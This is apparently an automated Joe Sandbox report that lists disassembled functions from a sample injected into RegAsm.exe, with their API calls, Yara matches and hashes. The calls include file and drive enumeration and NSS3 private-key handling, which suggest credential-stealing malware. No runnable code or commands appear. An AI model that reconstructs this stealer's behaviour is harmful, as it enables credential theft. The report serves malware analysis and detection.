                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1592259726-0
                                                                                • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                Function 00401ED6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                  • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1592259726-0
                                                                                • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                Function 00415A3A Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                  • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                  • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                  • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                  • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                  • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                  • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                  • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                • String ID:
                                                                                • API String ID: 373919974-0
                                                                                • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                Function 00410D21 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPathlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1699248803-0
                                                                                • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                Function 00410D6D Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0

                                                                                Non-executed Functions

                                                                                Function 6C7C64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7C64DF
                                                                                • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7C64F2
                                                                                • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C7C6505
                                                                                • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C7C6518
                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7C652B
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C7C671C
                                                                                • GetCurrentProcess.KERNEL32 ref: 6C7C6724
                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7C672F
                                                                                • GetCurrentProcess.KERNEL32 ref: 6C7C6759
                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7C6764
                                                                                • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C7C6A80
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7C6ABE
                                                                                • __Init_thread_footer.LIBCMT ref: 6C7C6AD3
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7C6AE8
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7C6AF7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                • API String ID: 487479824-2878602165
                                                                                • Opcode ID: 25675f80ad720d3522ae76ac0f820d4c0d1318205ed47000b52d803121b6e871
                                                                                • Instruction ID: 3402a34a43391dead3ebe19d5ec8d5b21062ef31fb0d0ff38519cfe5b26e2969
                                                                                • Opcode Fuzzy Hash: 25675f80ad720d3522ae76ac0f820d4c0d1318205ed47000b52d803121b6e871
                                                                                • Instruction Fuzzy Hash: BCF1F870A0562A9FDB30CF64CE887AAB7B4AF45318F1445A9D809A7741D731AF84CF92
                                                                                Function 00415E66 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415E6B
                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                • wsprintfA.USER32 ref: 00415EA2
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                • StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
                                                                                • StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
                                                                                • wsprintfA.USER32 ref: 00415F14
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00412DD7: _EH_prolog.MSVCRT ref: 00412DDC
                                                                                  • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412DFD
                                                                                  • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412E0B
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E55
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                  • Part of subcall function 00412DD7: StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00416043
                                                                                • FindClose.KERNEL32(00000000), ref: 00416052
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416077
                                                                                • lstrcat.KERNEL32(?), ref: 0041608A
                                                                                • lstrlenA.KERNEL32(?), ref: 00416093
                                                                                • lstrlenA.KERNEL32(?), ref: 004160A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 398052587-2848263008
                                                                                • Opcode ID: 1bcb0b38f1a17cb0672a22c6c26888d8bc869176a42e8f65a2590460e48f2c2c
                                                                                • Instruction ID: e4a2cc813173545a5fe5718903611597e3c30fccfebff89f3e167d8ce9cdb46d
                                                                                • Opcode Fuzzy Hash: 1bcb0b38f1a17cb0672a22c6c26888d8bc869176a42e8f65a2590460e48f2c2c
                                                                                • Instruction Fuzzy Hash: DB817A71D00259AFDF10EBE4DD49BEEBBB8AF19308F00407AF509A3191DB789648CB65
                                                                                Function 6C93EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C93C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C93DAE2,?), ref: 6C93C6C2
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F0AE
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F0C8
                                                                                • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C93F101
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F11D
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CA0218C), ref: 6C93F183
                                                                                • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C93F19A
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93F1CB
                                                                                • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C93F1EF
                                                                                • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C93F210
                                                                                  • Part of subcall function 6C8E52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C93F1E9,?,00000000,?,?), ref: 6C8E52F5
                                                                                  • Part of subcall function 6C8E52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C8E530F
                                                                                  • Part of subcall function 6C8E52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C8E5326
                                                                                  • Part of subcall function 6C8E52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C93F1E9,?,00000000,?,?), ref: 6C8E5340
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93F227
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C93F23E
                                                                                  • Part of subcall function 6C92BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C8DE708,00000000,00000000,00000004,00000000), ref: 6C92BE6A
                                                                                  • Part of subcall function 6C92BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C8E04DC,?), ref: 6C92BE7E
                                                                                  • Part of subcall function 6C92BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C92BEC2
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C93F2BB
                                                                                • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C93F3A8
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C93F3B3
                                                                                  • Part of subcall function 6C8E2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C8E2D3C
                                                                                  • Part of subcall function 6C8E2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8E2D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                • String ID:
                                                                                • API String ID: 1559028977-0
                                                                                • Opcode ID: bc7e086a7591fd9ba06711dbbd7defbd89b08df7a616ba6e7aaeb15fe64f98f0
                                                                                • Instruction ID: db1d7fc64f32bde3bf60473e9a938ac71ce052ae605f558657b80a0a94aae783
                                                                                • Opcode Fuzzy Hash: bc7e086a7591fd9ba06711dbbd7defbd89b08df7a616ba6e7aaeb15fe64f98f0
                                                                                • Instruction Fuzzy Hash: 7ED1A0B6E012259FDB14CF99D880A9EB7F9EF5830CF148069E919ABB11E731E805CB50
                                                                                Function 0040A981 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040A986
                                                                                • wsprintfA.USER32 ref: 0040A9AF
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                • StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
                                                                                • StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF44
                                                                                • FindClose.KERNEL32(00000000), ref: 0040AF53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                • String ID: #$%s\*.*
                                                                                • API String ID: 1095930517-2760317471
                                                                                • Opcode ID: f57dbc4b3c42bfcb8d2e40b16b3aac21894dd785c7ae38fd2cd95bc549fe5d80
                                                                                • Instruction ID: a122975dc251b7c6bf4e58e1bde1a9732a5f2d9225262cdb85f580827bdd3275
